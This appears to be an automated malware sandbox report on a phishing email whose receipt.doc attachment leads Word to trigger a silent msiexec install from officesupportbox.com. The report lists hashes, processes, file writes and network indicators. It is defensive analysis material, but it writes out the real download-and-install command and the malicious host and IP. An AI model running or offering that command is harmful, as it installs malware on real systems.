File name: | 0aa1_1a14_50967d5b_47b2_4abb_a7bd_580bb16bb73e.eml (76.2 KB).msg |
Full analysis: | https://app.any.run/tasks/e527d344-39dd-465b-ae72-8f022369ff71 |
Verdict: | Malicious activity |
Analysis date: | November 08, 2018, 11:56:34 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/vnd.ms-outlook |
File info: | CDFV2 Microsoft Outlook Message |
MD5: | 0ED359F2C121278A26621E78DF05D934 |
SHA1: | E14D5D7323C13FCD19B6EB23328EC7DE783AF443 |
SHA256: | EFDB05BE34AEB3E200C1E479239719EB3F3705C0E71BF607938FFAB2F778CB89 |
SSDEEP: | 1536:CbKHTtDCzY8S5GxvSt3y83D2hY2Mgmx32p:CbKHTtD+Kt3R4Y2Dmxg |
.msg | | | Outlook Message (38.9) |
---|---|---|
.oft | | | Outlook Form Template (22.7) |
.doc | | | Microsoft Word document (17.5) |
.xls | | | Microsoft Excel sheet (16.4) |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3656 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\0aa1_1a14_50967d5b_47b2_4abb_a7bd_580bb16bb73e.eml (76.2 KB).msg" | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Version: 14.0.6025.1000 | ||||
1316 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\ASOY3S5M\receipt.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | OUTLOOK.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3380 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3896 | C:\Windows\System32\msiexec.exe VI=ssa EXE=DLL /q /norestart /i http://officesupportbox.com/WMIsvc | C:\Windows\System32\msiexec.exe | — | taskeng.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
2992 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3656 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVR316B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3656 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\~DF9A17F04EDE094173.TMP | — | |
MD5:— | SHA256:— | |||
3656 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\ASOY3S5M\receipt (2).doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
1316 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4EF6.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1316 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_CECDADC5-135E-427F-8D33-48494C895510.0\6CCD04E3.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
3380 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_CECDADC5-135E-427F-8D33-48494C895510.0\~DF524EAC0935DE4F5F.TMP | — | |
MD5:— | SHA256:— | |||
3656 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | |
MD5:6BBD88CA96C0C665DBA6AA647C1F25D3 | SHA256:544BC2EC696B2829985ECE9A38FC622D4166E8EECAABA99946BA1460F2A02130 | |||
3656 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\ASOY3S5M\receipt (2).doc | document | |
MD5:D5196A49F3C6B7C354CB8C76BBB60ED5 | SHA256:2003B152F09BBBF38702B7265A92E1470F8F1BFE5278B0F171B604F276A05958 | |||
1316 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D95C70EB56AF78F5151A09E0808265F3 | SHA256:C5314D7147EF093EF1E52B562BA5AB376880EF134B4D8C68BDF5E9ECDC64652B | |||
1316 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_CECDADC5-135E-427F-8D33-48494C895510.0\6CCD04E3.doc | document | |
MD5:D5196A49F3C6B7C354CB8C76BBB60ED5 | SHA256:2003B152F09BBBF38702B7265A92E1470F8F1BFE5278B0F171B604F276A05958 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2992 | msiexec.exe | GET | — | 185.244.130.88:80 | http://officesupportbox.com/WMIsvc | unknown | — | — | malicious |
3656 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3656 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
2992 | msiexec.exe | 185.244.130.88:80 | officesupportbox.com | — | — | malicious |
Domain | IP | Reputation |
---|---|---|
config.messenger.msn.com |
| whitelisted |
officesupportbox.com |
| malicious |